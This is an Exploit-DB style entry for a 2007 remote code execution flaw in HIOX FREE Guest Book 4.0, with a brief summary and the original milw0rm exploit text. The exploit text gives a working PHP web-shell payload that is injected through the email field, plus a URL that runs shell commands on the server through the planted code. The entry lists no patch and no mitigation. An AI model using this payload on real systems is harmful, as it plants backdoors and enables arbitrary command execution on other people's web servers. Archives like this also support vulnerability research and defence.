HIOX FREE Guest Book Remote Code Execution Vulnerability

vendor:

HIOX FREE Guest Book

by:

Dj7xpl

N/A

CVSS

N/A

Remote Code Execution Vulnerability

CWE

Product Name: HIOX FREE Guest Book

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

HIOX FREE Guest Book Remote Code Execution Vulnerability

The vulnerability allows an attacker to execute remote code on the target system. The exploit involves opening the target by browser, inserting bad code in an email, and accessing the bad code through a specific URL. The vulnerability allows an attacker to execute arbitrary commands on the target system.

Mitigation:

Source

Exploit-DB raw data:

+========================I=R=A=N============================+

                     HGB Version 4.0 

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Author :

Dj7xpl / Dj7xpl[at]Yahoo[dot]com

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Type :

Remote Code Execution Vulnerability

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Product / Vendor :

HIOX FREE Guest Book

http://www.hscripts.com/scripts/php/guestbook.php

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Bug :

[1] Open Target By Browser

[2] Insert Bad Code In Email                           E.g :   <?php passthru($_GET[cmd]);?>@yahoo.com

[3] See Bad C0de   :  http://[Targe]/[Path]/gb.php     E.g   :  http://dj7xpl.ir/hgb/gb.php?cmd=dir

=========================I=R=A=N=============================

#Iran_e Sarbolande Man Sarboland Mimanad
#Sp Tnx : str0ke

# milw0rm.com [2007-04-10]